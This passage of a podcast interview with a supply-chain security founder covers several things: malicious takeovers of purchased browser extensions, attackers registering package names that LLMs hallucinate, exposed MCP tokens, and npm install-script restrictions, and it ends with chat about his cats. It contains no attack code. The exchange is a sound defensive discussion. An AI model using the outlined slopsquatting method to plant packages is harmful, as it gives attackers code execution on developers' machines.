[0:35:21] FA: Yeah, there are a couple of ways I could take this. I think I'll maybe mention the way that we're seeing some of the same types of attacks that have affected open source package ecosystems starting to come to less obvious ecosystems like Chrome extensions, Firefox extensions, VS Code extensions. These are also just JavaScript packages at the end of the day, if you think about it. And so some of the same types of supply chain attacks that we've seen affect npm are now starting to affect all these other ones. But they also have, in some ways, their own challenges. If you take Chrome extensions, for example, they're similar to npm packages in that they run in a very privileged environment. They run in your browser. And some of them have access to all site content on all pages that you visit. Very similar to a package running on your local machine with all of your user permissions and being able to access all your local files and things like that. But in some ways, they're even worse, because there's a certain thing we've seen in Chrome extensions that we've seen a lot less of in open source ecosystems, and that is the selling of extensions. Folks will just sell their extension to somebody else. It could have a million installs, and they'll just sell it for like 30k or 40k to some random person who offers them money. And I kind of get where they're coming from.
A lot of times folks build these extensions, and they don't have any way to monetize them. They're just sitting there, and then they can get a meaningful chunk of money like that. They're just like, "Yeah, why not?" And they often don't necessarily know that the person buying it is going to change the behavior in a malicious way. The buyers often tell a story about how they're going to improve it, they're going to keep working on it, and all this other stuff. We've seen that happen a few times in the Chrome ecosystem, with really poor results for everybody involved. I think that's an area where, I guess, it's sort of expected that attackers are going to go. They're just always looking for the next way to get into environments. And just to cap that off, I should mention that we actually just announced this week, yesterday, so July 29th, for those who are listening to this at a future date, that we now scan Chrome extensions. And we're going to be doing VS Code and the rest. A very exciting new product for us. And, yeah, hopefully we can help keep folks safe even in their browser.

But I think the other thing that's interesting is AI, just the way folks are using it. There are a lot of folks vibe coding these days. And one other area that we've seen attackers go is, everyone knows LLMs can hallucinate. And one of the most dangerous ways they can hallucinate is when they're writing code, especially if they're executing that code without user interaction, like in an agent. And so everyone is pretty aware, I think, of the idea that they can write buggy code, they can write poor quality code, spaghetti code. But far fewer people have realized that LLMs can also just write insecure code. Or, specifically, they can install dependencies that are insecure. In some cases, they can hallucinate package names that don't even exist. They're not even real packages.
And so what attackers have actually started doing is running the LLMs and asking the same question a bunch of times, getting a bunch of lists of what packages the LLM attempts to install. And then they go and they squat on those names. If you can basically predict what the LLM is going to hallucinate, you can go register all those names. And just like you would squat on a domain name, you can squat on the hallucinated names. And then you can basically get remote code execution on anyone's machine when the LLM selects those packages. That one is nasty, and it's very, very much a 2025 kind of problem.

[0:38:50] JG: It's kind of a beautiful attack when you think about it. It's just so clever.

[0:38:54] FA: Yeah, I agree. Attackers are always - I mean, that's what they do. Whatever is new, they're already thinking of how to break it. In this AI world, where everyone's just trying to go super fast, and security is an afterthought, as it always is whenever there's a new paradigm shift, there's going to be stuff like this, and the attackers are going to find it. And that's definitely what's happening with AI. Security is such an afterthought. And the other one is MCP servers, right? Everyone is just hooking things up. They're taking all these API tokens and putting them into local files on their disk that any malware can just grab, right? Any npm package that's backdoored can just take those things. They're putting all these tokens into these files, and then they're connecting all these disparate data sources, like their Google Drive, their email, all your most sensitive information, so that they can talk to it and have the MCP server give new tools to the agents. But then, first of all, the files are just sitting there with all the tokens. And on top of that, you fundamentally have a black-box AI model that nobody really knows what it's going to do, that has privileged tokens accessing all this stuff.
It keeps me up at night a little bit.

[0:39:58] JG: As a member of the defense, or the blue team, how do you defend against these types of attacks?

[0:40:04] FA: I don't know if there's a really good way for a lot of this AI stuff, because a lot of the adoption is being driven by company boards and company leadership. They don't want to be left behind. They're getting asked all the time, "What is your AI strategy? What are you going to do for AI?" And so there's a lot of pressure to just tell everybody to use all the stuff and not worry so much about security. Even formerly very security-conscious companies, and CTOs, and engineering leaders are lowering their standards a little bit in this rush to adopt this stuff super fast. I don't have a great answer for how to generally solve this problem. I think security will get figured out over the next couple of years, like it always does with these things, and it'll be bolted on, and it'll have a bunch of gotchas, as it always does when you do it after the fact. I don't know. We'll see.

[0:40:50] JG: We'll see. I've got one last technical question, just as a curiosity. There are the traditional ways to run JavaScript that you've mentioned, Node and npm. And now there are newer variants, pnpm and Deno, that have more restrictive security models. Do you have thoughts or opinions on those in the security landscape, given what we've talked about?

[0:41:10] FA: Yeah, I love more experimentation. I love to see the stuff that those teams are doing. pnpm, I believe, now restricts install scripts by default. That's awesome to see. Because, like I said, yes, they have legitimate uses. But if you have a backdoored package, if you have a malicious package, the vast majority of them are going to use that feature.
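For teams on plain npm, a blunt version of this opt-out has existed for a long time: the `ignore-scripts` setting (a real npm config flag, though note it disables lifecycle scripts for all dependencies, so packages that genuinely need a build step will require special handling):

```ini
# .npmrc at the project root: never run preinstall/install/postinstall
# scripts from dependencies.
ignore-scripts=true
```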
And the other thing that's nice about it is that install scripts are such a rarely used piece of functionality that it's actually not that onerous to just ask the user, "Hey, is it okay if this package runs this install script?" I think it's really great what they did. And then Deno obviously has its permission model, which is really interesting. I'm a fan of that. Node has also actually adopted something similar. It's pretty different, but it sort of does the same thing: a way of running packages with really locked-down permissions on those executions. It's great to see this kind of stuff. I will say, though, I've met very few people that are actually able to use it. I don't want to pick on anyone, but Node and Deno's permission models are not really used, in my experience at least, in real-world applications. It's really helpful when you're pulling a random script off the internet and you want to run it, and you don't want to give it access to the network and to your file system and stuff. It's amazing. But if you're building a real application that has to do all the things, talk to the network, read the files, all this stuff, you're going to give it all the permissions anyway. And so, I think it's good, but it's not widely used and not really in its final form yet.

[0:42:32] JG: More feature-rich experimentation required.

[0:42:35] FA: Yeah, I think so. And then more work on the developer experience. How do you write these policy files? The Node policy file is a really complex format, last I looked at it. I think there will need to be ways to autogenerate that, ways that work really effectively and don't break your application, before you're going to see widespread adoption of that kind of stuff.

[0:42:52] JG: Looking forward to it. For us, in our last minute, I'd like to end interviews with something very much non-technical. Can you tell us about your cats?

[0:43:00] FA: Sure. Yeah. I've got two cats. One is called Butter, and one is called Cream.
And they are about one year old now. Actually, they just turned one. And they're amazing. They're super cute. I was hesitant to get cats for a super long time because I'm really busy working on the company and traveling a lot, and I thought it would be a bit of a burden to find someone to take care of them when we're gone and stuff like that. But my wife was really excited about the idea of getting them. And I've always loved cats. And so she kept talking about it. And then one day, I come home and, in the bathroom, in the bathtub, I find a bunch of litter, cat food, and a bunch of cat toys. And I'm like, "Okay, she's up to something." And then the next day, when I come home, there are two kittens in the house. She just went off on her own and got them. Found them on Craigslist, actually. There was someone who was looking for a home for their two kittens. And she got sent some videos, and then actually had them delivered via Uber package delivery. Uber picked them up and drove them two hours to our place. And that was probably a really fun Uber ride for that driver, having two kittens in the car. It's been amazing. They are a joy.

[0:44:18] JG: Cats are fantastic. Since you mentioned conferences earlier, I've found that in cities that have a large number of cats, Athens, for example, going out with other conference attendees and speakers to feed street cats is a surprisingly fantastic bonding and networking activity.

[0:44:30] FA: That's so funny. They just go out and give food to the cats and hang out with them, the wild cats?

[0:44:34] JG: Yeah. Walk 30 seconds in any direction from, say, the city center of Athens, and you'll find them.

[0:44:40] FA: That's awesome. I've also found certain parts of Tokyo, or certain neighborhoods, have tons of wild cats. Well, feral cats, I guess, going around. And I just love cats. Their behaviors, they're super cute. They're always up to something, you know?
They're always investigating or trying to do something that they're not supposed to. It's kind of fun.

[0:45:01] JG: Given how much time you spend day-to-day on people with very malicious intentions, it must be nice to work with a creature whose maximum maliciousness is that they want the treat you're not supposed to give them.

[0:45:11] FA: Yeah, it's so true. They do get in trouble, too. They do find ways to climb into things they're not supposed to get to. We just built a catio, which is like a little cat house, outdoors over here by my desk. And it's quite big. It's like an 8-foot by 6-foot outdoor structure. And I just crack the door, and then they're able to go directly into the catio. But there's currently a little gap in the part above it. And so they figured out they can climb up the side of it and then get outside. I'm going to have to add another layer of chicken wire on the top to fully seal it, along with the door. Or else they're going to find a way to get out.

[0:45:51] JG: Crafty creatures.

[0:45:52] FA: Yeah, for sure.

[0:45:52] JG: Well, Feross, thank you so much for spending extra time to talk not just about your open source career and journey, and what it's like to be a maintainer, and all the stuff Socket is doing to help protect open source projects and companies, but also about your two adorable cats. If folks want to learn more about you and/or Socket, where would you ask that they go on the internet?

[0:46:10] FA: Yeah, I have a blog that doesn't get updated that much, but it has a bunch of my writing, at feross.org. And then you can learn about Socket at socket.dev. And if folks want to email me, my email is just my first name @socket.dev. Feel free to hit me up. I always love talking about open source, or security, or whatever. Feel free to reach out.

[0:46:29] JG: Well, that's fantastic. For Software Engineering Daily, this has been Feross Aboukhadijeh and Josh Goldberg. Cheers, y'all. Have a nice day.

[0:46:34] FA: Thanks, Josh.

[END]